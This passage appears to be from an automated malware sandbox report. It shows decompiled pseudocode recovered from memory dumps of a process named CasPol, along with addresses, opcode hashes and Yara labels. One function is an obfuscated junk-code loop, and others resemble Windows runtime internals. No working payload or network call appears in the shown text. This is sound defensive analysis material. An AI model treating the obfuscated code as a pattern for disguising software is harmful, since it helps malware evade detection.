							__edi = __edi +  *0xcede2edc;
							__eax =  *0x6424586a * 0x9a98;
							asm("stosd");
							__ecx = __ecx - 1;
						}
					}
				}
				L1:
				_t42 = _t42 + 0x4044a4c7;
				asm("sbb dh, [0x448f6410]");
				_t60 = _t60 +  *0xfd6804f7;
				L1();
				_t36 = _t36 +  *0x4505d66;
				if(_t36 > 0) {
					 *0xf29b0476 =  *0xf29b0476 & _t36;
					 *0xc6faa32 =  *0xc6faa32 + _t33;
					if( *0xc6faa32 <= 0) {
						 *0xdd024877 =  *0xdd024877 & _t60;
						_t7 = _t33;
						_t33 =  *0x425540d7;
						 *0x425540d7 = _t7;
						_push(_t63);
						if( *0xdd024877 < 0) {
							_t60 = _t60 |  *0x20946671;
							asm("adc [0xc19767d5], edx");
							_push(0xe1c522ec);
							 *0xd830f51a =  *0xd830f51a ^ _t42;
							 *0x5128aeb3 =  *0x5128aeb3 + _t42;
							 *0xe1394881 =  *0xe1394881 + _t62;
							if(( *0x12fcafbb & 0x868d36f0) < 0) {
								asm("adc esi, 0xd2bb676d");
								 *0xd3fe81d1 =  *0xd3fe81d1 << 0xd3;
								asm("sbb edx, [0x70e392cf]");
								asm("adc edi, 0xbeb73a37");
								 *0xa69ded3e = _t62;
								_t42 = _t42 | 0x000000f2;
								asm("movsb");
								 *0xf976a99 =  *0xf976a99 - _t42;
								asm("scasd");
								_pop(_t34);
								_push( *0x2cc1f27d * 0x1799 - 0x9226e9);
								_t63 = _t63 + 1;
								 *0xc6f3fb94 =  *0xc6f3fb94 >> 0x1f;
								_t62 = _t62 + 0xe14d5af7;
								asm("ror dword [0xc49844cf], 0xc2");
								asm("adc ecx, 0xbfeceb07");
								asm("rcr dword [0x98ef2c6f], 0xcf");
								_t33 = _t34 & 0x03955083;
								_t66 = _t66 + 0xcf13d83e;
								 *0x623d31c7 =  *0x623d31c7 + _t62;
								if( *0x623d31c7 > 0) {
									_t63 =  *0x9683ed76;
									_t33 = _t33 |  *0x9d81c308;
									 *0x5ebc2f93 =  *0x5ebc2f93 << 0x52;
									 *0x70307ac2 = _t36;
									 *0x6ae5bf04 = _t36;
									 *0xc5784922 =  *0xc5784922 ^ _t36;
									asm("sbb ebx, [0x212cc8bd]");
									_t12 = _t42;
									_t42 =  *0x447c9036;
									 *0x447c9036 = _t12;
									if( *0xc5784922 == 0) {
										 *0x4186d9ed =  *0x4186d9ed | _t42;
										 *0x8e57f3d7 =  *0x8e57f3d7 + _t42;
										_pop(_t53);
										_t54 = _t53 +  *0x73e6a806;
										_pop(_t63);
										_t60 = _t60 |  *0xad6f3ec7;
										 *0x6ce3e128 =  *0x6ce3e128 << 0x4f;
										asm("sbb edx, 0x27eea2c4");
										_t66 = _t66 |  *0x71601ece;
										 *0x53689cd3 =  *0x53689cd3 >> 0x33;
										if(( *0x2a9b886c & _t60) >= 0) {
											asm("rol byte [0xf026b93c], 0xcf");
											asm("lodsb");
											_t60 = _t60 +  *0x58bf6bdd;
											_pop(_t44);
											_push( *0x5c86a0ff);
											_t63 =  *0x32016da3;
											asm("lodsd");
											asm("adc [0x9e374984], cl");
											_t55 = _t54 +  *0x4696add0;
											_t36 =  *0xdfd1626e;
											_t42 = (_t44 | 0x01a88d9a) -  *0x81117f0a;
											 *0x7ae6b800 =  *0x7ae6b800 >> 0xeb;
											asm("rcl byte [0xbe7a8d2], 0xd4");
											asm("cmpsb");
											 *0x5aad772d =  *0x5aad772d << 0xe5;
											_push( *0xd2e2a37);
											if( *0x5aad772d < 0) {
												 *0x37ae98f0 =  *0x37ae98f0 & _t55;
												asm("adc cl, 0x2a");
												asm("sbb esp, 0x1b78f326");
												_t36 = _t36 & 0x6b53dcb8;
												asm("scasb");
												_pop(_t47);
												_push(0x6eeab0a9);
												asm("ror dword [0x99e9050f], 0x65");
												_t42 = _t47;
												 *0xc31e7cbd =  *0xc31e7cbd << 0x61;
												 *0x1afa09ff =  *0x1afa09ff << 0x9c;
												if( *0x1afa09ff >= 0) {
													_t63 =  *0xaef3557c * 0x3f69;
													if(_t63 == 0) {
														_pop( *0x3680c275);
														 *0x768d3dc6 =  *0x768d3dc6 | _t42;
														 *0x39efe7bf =  *0x39efe7bf << 0xc0;
														 *0x6144721c =  *0x6144721c << 0xc1;
														if( *0x6144721c == 0) {
															_push(0x7656ac75);
															_t36 = _t36 &  *0x62ea9fb1;
															_t27 = _t33;
															_t33 =  *0x7b4b058c;
															 *0x7b4b058c = _t27;
															if(_t36 <= 0) {
																 *0xf16e17b8 =  *0xf16e17b8 << 0x58;
																 *0xa5767af2 =  *0x11a1807f * 0x48e0;
																_t42 = _t42 -  *0x5c76028d;
																_t60 = _t60 -  *0x62ff57d3;
																_t36 = 0xed662cda;
																 *0x2a630d97 =  *0x2a630d97 >> 0xbd;
																_t56 = _t55 - 0xe4;
																if(_t56 >= 0) {
																	asm("rol dword [0x52e32a78], 0x19");
																	asm("adc bl, 0xb6");
																	 *0xbe9dc7ed =  *0xbe9dc7ed | _t63;
																	 *0xd6aac80b =  *0xd6aac80b >> 0x4c;
																	 *0xb80ca632 =  *0xb80ca632 ^ (_t56 + 0x6a953539 | 0xaf3961a3);
																	_pop( *0x39a9c2ff);
																	 *0xca3ff0bc =  *0xca3ff0bc << 2;
																	asm("adc bl, 0xe7");
																	asm("ror byte [0x8e433510], 0x79");
																	asm("lodsd");
																	_t33 = _t33 ^  *0xbb669291 ^ 0x7712c22d;
																	asm("sbb esp, [0xbe39aec0]");
																	asm("adc bl, 0x38");
																	_t36 = 0xed662cda &  *0x52569bca;
																	_t42 = _t42 & 0x00000014;
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				goto L1;
			}




















                                                                0x00423220
                                                                0x00423225
                                                                0x00423226
                                                                0x0042322d
                                                                0x00423233
                                                                0x00423239
                                                                0x0042323f
                                                                0x0042324c
                                                                0x00423255
                                                                0x00423256
                                                                0x0042325c
                                                                0x00423268
                                                                0x0042326e
                                                                0x00423274
                                                                0x0042327a
                                                                0x00423280
                                                                0x00423280
                                                                0x00423280
                                                                0x00423286
                                                                0x0042328d
                                                                0x00423290
                                                                0x00423297
                                                                0x0042329d
                                                                0x004232a3
                                                                0x004232a5
                                                                0x004232ab
                                                                0x004232ac
                                                                0x004232b2
                                                                0x004232b9
                                                                0x004232be
                                                                0x004232c4
                                                                0x004232c7
                                                                0x004232cd
                                                                0x004232d3
                                                                0x004232d4
                                                                0x004232d5
                                                                0x004232e3
                                                                0x004232e9
                                                                0x004232ef
                                                                0x004232f5
                                                                0x004232fb
                                                                0x00423305
                                                                0x00423306
                                                                0x00423306
                                                                0x004232c7
                                                                0x00423297
                                                                0x00422ebf
                                                                0x00422ed1
                                                                0x00422ed7
                                                                0x00422ee3
                                                                0x00422ee9
                                                                0x00422efa
                                                                0x00422f00
                                                                0x00422f02
                                                                0x00422f08
                                                                0x00422f0e
                                                                0x00422f10
                                                                0x00422f16
                                                                0x00422f16
                                                                0x00422f16
                                                                0x00422f1c
                                                                0x00422f1d
                                                                0x00422f1f
                                                                0x00422f2b
                                                                0x00422f31
                                                                0x00422f36
                                                                0x00422f3c
                                                                0x00422f42
                                                                0x00422f4e
                                                                0x00422f65
                                                                0x00422f6b
                                                                0x00422f72
                                                                0x00422f78
                                                                0x00422f7e
                                                                0x00422f84
                                                                0x00422f8d
                                                                0x00422f8e
                                                                0x00422f94
                                                                0x00422f95
                                                                0x00422f96
                                                                0x00422f97
                                                                0x00422f98
                                                                0x00422f9f
                                                                0x00422fa5
                                                                0x00422fac
                                                                0x00422fb2
                                                                0x00422fb9
                                                                0x00422fbe
                                                                0x00422fc4
                                                                0x00422fca
                                                                0x00422fd0
                                                                0x00422fd6
                                                                0x00422fe2
                                                                0x00422fea
                                                                0x00422ff0
                                                                0x00422ff9
                                                                0x00422fff
                                                                0x00423005
                                                                0x00423005
                                                                0x00423005
                                                                0x0042300b
                                                                0x0042301d
                                                                0x00423023
                                                                0x00423029
                                                                0x0042302a
                                                                0x0042303d
                                                                0x0042303e
                                                                0x00423044
                                                                0x0042304b
                                                                0x00423051
                                                                0x00423057
                                                                0x00423070
                                                                0x00423083
                                                                0x0042308a
                                                                0x00423091
                                                                0x0042309d
                                                                0x0042309e
                                                                0x004230a5
                                                                0x004230ab
                                                                0x004230ac
                                                                0x004230b2
                                                                0x004230b8
                                                                0x004230c4
                                                                0x004230ca
                                                                0x004230d1
                                                                0x004230d8
                                                                0x004230d9
                                                                0x004230e0
                                                                0x004230e6
                                                                0x004230f2
                                                                0x004230f8
                                                                0x004230fb
                                                                0x00423101
                                                                0x00423107
                                                                0x00423108
                                                                0x00423109
                                                                0x0042310e
                                                                0x00423115
                                                                0x00423118
                                                                0x0042311f
                                                                0x00423126
                                                                0x0042312c
                                                                0x00423136
                                                                0x0042313c
                                                                0x00423142
                                                                0x00423148
                                                                0x0042314f
                                                                0x00423156
                                                                0x0042315c
                                                                0x00423161
                                                                0x00423167
                                                                0x00423167
                                                                0x00423167
                                                                0x0042316d
                                                                0x0042317d
                                                                0x00423184
                                                                0x0042318a
                                                                0x00423190
                                                                0x00423196
                                                                0x0042319c
                                                                0x004231a3
                                                                0x004231a6
                                                                0x004231ac
                                                                0x004231b9
                                                                0x004231c2
                                                                0x004231ce
                                                                0x004231d5
                                                                0x004231db
                                                                0x004231e1
                                                                0x004231e8
                                                                0x004231eb
                                                                0x00423202
                                                                0x00423203
                                                                0x00423208
                                                                0x0042320e
                                                                0x00423211
                                                                0x00423217
                                                                0x00423217
                                                                0x004231a6
                                                                0x0042316d
                                                                0x00423156
                                                                0x00423136
                                                                0x00423126
                                                                0x004230e6
                                                                0x00423070
                                                                0x0042300b
                                                                0x00422fca
                                                                0x00422f4e
                                                                0x00422f1d
                                                                0x00422f0e
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: da59adba05534ef752beabad9a94672afba0b89ca2e35ef39f75193d74d64d0d
                                                                • Instruction ID: 5ad36da0b66271df10871577adf4d074f67d7f2fbf4e1e217e99ca9f372f47b0
                                                                • Opcode Fuzzy Hash: da59adba05534ef752beabad9a94672afba0b89ca2e35ef39f75193d74d64d0d
                                                                • Instruction Fuzzy Hash: CFA1D7729093A4DFE312DF38E946B163BB5F352720B48470ED8A1472C2D7B8161ADF4A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016BB8D0 Relevance: .2, Instructions: 199COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 39%
                                                                			E016BB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1717b9c; // 0x0
				_t124 = L01644620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E01669800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E016695B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E016695D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L016477F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E01669910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E016695D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1717b9c; // 0x0
									_t92 = L01644620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E01669910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0162A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E016BE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E016BE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E016695B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                                0x016bb8d9
                                                                0x016bb8e4
                                                                0x00000000
                                                                0x016bb8e6
                                                                0x016bb8f3
                                                                0x016bb8f5
                                                                0x016bb8f5
                                                                0x016bb8f8
                                                                0x016bb920
                                                                0x016bb924
                                                                0x016bb936
                                                                0x016bb939
                                                                0x016bb93d
                                                                0x016bb948
                                                                0x016bb9a0
                                                                0x016bb9a0
                                                                0x016bb9a4
                                                                0x016bb9bf
                                                                0x016bb9c4
                                                                0x016bb9c6
                                                                0x016bb9cd
                                                                0x016bb9d1
                                                                0x016bbad4
                                                                0x016bbad8
                                                                0x016bbada
                                                                0x016bbadc
                                                                0x016bbadc
                                                                0x016bbadf
                                                                0x016bbae0
                                                                0x016bbae2
                                                                0x016bbae4
                                                                0x016bbaec
                                                                0x016bbaee
                                                                0x016bbaf0
                                                                0x016bbaf0
                                                                0x016bbaec
                                                                0x016bbafb
                                                                0x016bbafc
                                                                0x016bbafe
                                                                0x016bbb01
                                                                0x016bbb01
                                                                0x00000000
                                                                0x016bbb06
                                                                0x016bb9d7
                                                                0x016bb9db
                                                                0x016bb9db
                                                                0x016bb9de
                                                                0x016bb9de
                                                                0x016bb9e4
                                                                0x016bb9e7
                                                                0x016bb9ea
                                                                0x016bb9ec
                                                                0x016bb9ef
                                                                0x016bb9f3
                                                                0x016bba1b
                                                                0x016bba1b
                                                                0x016bba23
                                                                0x016bba24
                                                                0x016bba27
                                                                0x016bba2a
                                                                0x016bba2b
                                                                0x016bba2e
                                                                0x016bba30
                                                                0x016bba37
                                                                0x016bba3f
                                                                0x016bba9c
                                                                0x016bbaa2
                                                                0x016bbb13
                                                                0x016bbb15
                                                                0x016bbaae
                                                                0x016bbaae
                                                                0x016bbab3
                                                                0x016bbab5
                                                                0x016bbaba
                                                                0x016bbac8
                                                                0x016bbac8
                                                                0x016bbaba
                                                                0x016bbacd
                                                                0x016bbacf
                                                                0x00000000
                                                                0x016bbacf
                                                                0x016bbb1a
                                                                0x00000000
                                                                0x016bbb1c
                                                                0x016bbaa7
                                                                0x016bbb11
                                                                0x00000000
                                                                0x016bbb11
                                                                0x016bbaa9
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016bba41
                                                                0x016bba41
                                                                0x016bba41
                                                                0x016bba58
                                                                0x016bba5d
                                                                0x016bba62
                                                                0x00000000
                                                                0x00000000
                                                                0x016bba64
                                                                0x016bba67
                                                                0x016bba68
                                                                0x016bba69
                                                                0x016bba6c
                                                                0x016bba6f
                                                                0x016bba71
                                                                0x016bba78
                                                                0x016bba80
                                                                0x00000000
                                                                0x00000000
                                                                0x016bba90
                                                                0x016bba90
                                                                0x016bba97
                                                                0x00000000
                                                                0x016bba97
                                                                0x016bb9f5
                                                                0x016bb9f7
                                                                0x016bb9f7
                                                                0x016bb9fa
                                                                0x016bba03
                                                                0x016bba07
                                                                0x016bba0c
                                                                0x016bba10
                                                                0x016bba17
                                                                0x00000000
                                                                0x016bb9f7
                                                                0x016bb9a6
                                                                0x016bb9a8
                                                                0x016bb9af
                                                                0x016bb9b3
                                                                0x00000000
                                                                0x00000000
                                                                0x016bb9b9
                                                                0x00000000
                                                                0x016bb9b9
                                                                0x016bb94d
                                                                0x016bb98f
                                                                0x016bb995
                                                                0x016bb999
                                                                0x016bb960
                                                                0x016bb967
                                                                0x016bb968
                                                                0x016bb96a
                                                                0x00000000
                                                                0x016bb96a
                                                                0x016bb99b
                                                                0x016bb99e
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016bb99e
                                                                0x016bb951
                                                                0x016bb954
                                                                0x016bb95a
                                                                0x016bb95e
                                                                0x016bb972
                                                                0x016bb979
                                                                0x016bb97d
                                                                0x016bb97f
                                                                0x016bb980
                                                                0x016bb982
                                                                0x016bb984
                                                                0x00000000
                                                                0x016bb984
                                                                0x00000000
                                                                0x016bb926
                                                                0x00000000
                                                                0x016bb926

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cd04bbafea35fa62260ec776fd53676790801300a12737a460bf27a65606392b
                                                                • Instruction ID: 3aafd0da5c6b6e0fa222a3a056c99d5644905ae77a8a74faf356e9be1d42dd65
                                                                • Opcode Fuzzy Hash: cd04bbafea35fa62260ec776fd53676790801300a12737a460bf27a65606392b
                                                                • Instruction Fuzzy Hash: B671F132640702EFE732DF18CC85FA6BBA6EB40720F15492CEA55876A1DB71E981CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016A6DC9 Relevance: .2, Instructions: 199COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 79%
                                                                			E016A6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L01644620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E016A6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E01647D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E01669AE0();
					_t87 = L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E016A795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E016A795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E016A795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E016A795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L01644620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E016A6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E016A6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E016A6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E016A6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E01647D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E01669AE0();
								L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L01642400( &_v36);
							if(_v24 >= 0) {
								_t87 = L01642400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L01642400( &_v52);
							}
							if(_v28 >= 0) {
								return L01642400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                                0x016a6dd4
                                                                0x016a6dde
                                                                0x016a6de1
                                                                0x016a6de3
                                                                0x016a6de6
                                                                0x016a6de9
                                                                0x016a6dec
                                                                0x016a6def
                                                                0x016a6df2
                                                                0x016a6df5
                                                                0x016a6dfe
                                                                0x016a6e04
                                                                0x016a6e09
                                                                0x016a6e0d
                                                                0x016a6e18
                                                                0x016a6e1b
                                                                0x016a6e22
                                                                0x016a6e2d
                                                                0x016a6e30
                                                                0x016a6e36
                                                                0x016a6e42
                                                                0x016a6e4d
                                                                0x016a6e50
                                                                0x016a6e55
                                                                0x016a6e5c
                                                                0x016a6e6e
                                                                0x016a6e5e
                                                                0x016a6e67
                                                                0x016a6e67
                                                                0x016a6e73
                                                                0x016a6e74
                                                                0x016a6e77
                                                                0x016a6e7c
                                                                0x016a6e7d
                                                                0x016a6e8e
                                                                0x016a6e93
                                                                0x016a6e9c
                                                                0x016a6ea8
                                                                0x016a6eab
                                                                0x016a6eac
                                                                0x016a6eb3
                                                                0x016a6ecd
                                                                0x016a6edc
                                                                0x016a6ee2
                                                                0x016a6ee5
                                                                0x016a6ef2
                                                                0x016a6efb
                                                                0x016a6f01
                                                                0x016a6f06
                                                                0x016a6f0b
                                                                0x016a6f11
                                                                0x016a6f1a
                                                                0x016a6f22
                                                                0x016a6f26
                                                                0x016a6f26
                                                                0x016a6f33
                                                                0x016a6f41
                                                                0x016a6f44
                                                                0x016a6f47
                                                                0x016a6f54
                                                                0x016a6f65
                                                                0x016a6f77
                                                                0x016a6f7c
                                                                0x016a6f82
                                                                0x016a6f91
                                                                0x016a6f99
                                                                0x016a6fa3
                                                                0x016a6fae
                                                                0x016a6fae
                                                                0x016a6fba
                                                                0x016a6fbb
                                                                0x016a6fbc
                                                                0x016a6fc1
                                                                0x016a6fc2
                                                                0x016a6fd3
                                                                0x016a6fd8
                                                                0x016a6fd8
                                                                0x016a6fdf
                                                                0x016a6fe8
                                                                0x016a6fee
                                                                0x016a6fee
                                                                0x016a6ff5
                                                                0x016a6ffb
                                                                0x016a6ffb
                                                                0x016a7004
                                                                0x00000000
                                                                0x016a700a
                                                                0x016a7004
                                                                0x016a6eb3
                                                                0x016a6e9c
                                                                0x016a7015

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                • Instruction ID: dad0ceefa39edb3dc9c80d6680bef4058b6f058031d30dc8fe5e1a48246f5ad4
                                                                • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                • Instruction Fuzzy Hash: 22716B71A0021AEFDB10DFA8CD84AEEBBBAFF48714F544469E505A7250DB30AE41CF94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016E1002 Relevance: .2, Instructions: 198COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E016E1002(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _t75;
				intOrPtr* _t76;
				signed int _t77;
				signed short _t78;
				signed short _t80;
				signed int _t81;
				signed short _t82;
				signed short _t83;
				signed short _t85;
				signed int _t86;
				void* _t90;
				signed short _t91;
				signed int _t95;
				signed short _t97;
				signed short _t99;
				intOrPtr* _t101;
				signed short _t102;
				signed int _t103;
				signed short _t105;
				intOrPtr _t106;
				signed int* _t108;
				signed short _t109;
				signed short _t111;
				signed short _t112;
				signed int _t113;
				signed short _t117;
				signed int _t120;
				void* _t121;
				signed int _t122;
				signed int _t126;
				signed int* _t127;
				signed short _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				signed int _t132;
				signed int _t133;

				_t121 = __edx;
				_t130 = __ecx;
				_v16 = __ecx;
				_t108 = __ecx + 0xa4;
				_t75 =  *_t108;
				L4:
				L4:
				if(_t75 != _t108) {
					goto L1;
				} else {
					_t127 = _t130 + 0x9c;
					_t120 =  *_t127;
				}
				while(_t120 != _t127) {
					_t132 = _t120 & 0xffff0000;
					__eflags = _t132 - _t121;
					if(_t132 <= _t121) {
						_t75 =  *((intOrPtr*)(_t120 + 0x14)) + _t132;
						__eflags = _t75 - _t121;
						if(_t75 > _t121) {
							 *0x1715898 = 5;
						}
					}
					_t120 =  *_t120;
				}
				L68:
				return _t75;
				L1:
				_t3 = _t75 - 0x10; // -16
				_t126 = _t3;
				_v20 = _t126;
				__eflags =  *((intOrPtr*)(_t126 + 0x1c)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x1c)) > _t121) {
					L3:
					_t75 =  *_t75;
					goto L4;
				}
				__eflags =  *((intOrPtr*)(_t126 + 0x28)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x28)) > _t121) {
					_t8 = _t126 + 0x38; // 0x28
					_t101 = _t8;
					_t109 = 0;
					_v8 = _v8 & 0;
					_t76 =  *_t101;
					_v12 = _t101;
					__eflags = _t76 - _t101;
					if(_t76 == _t101) {
						L17:
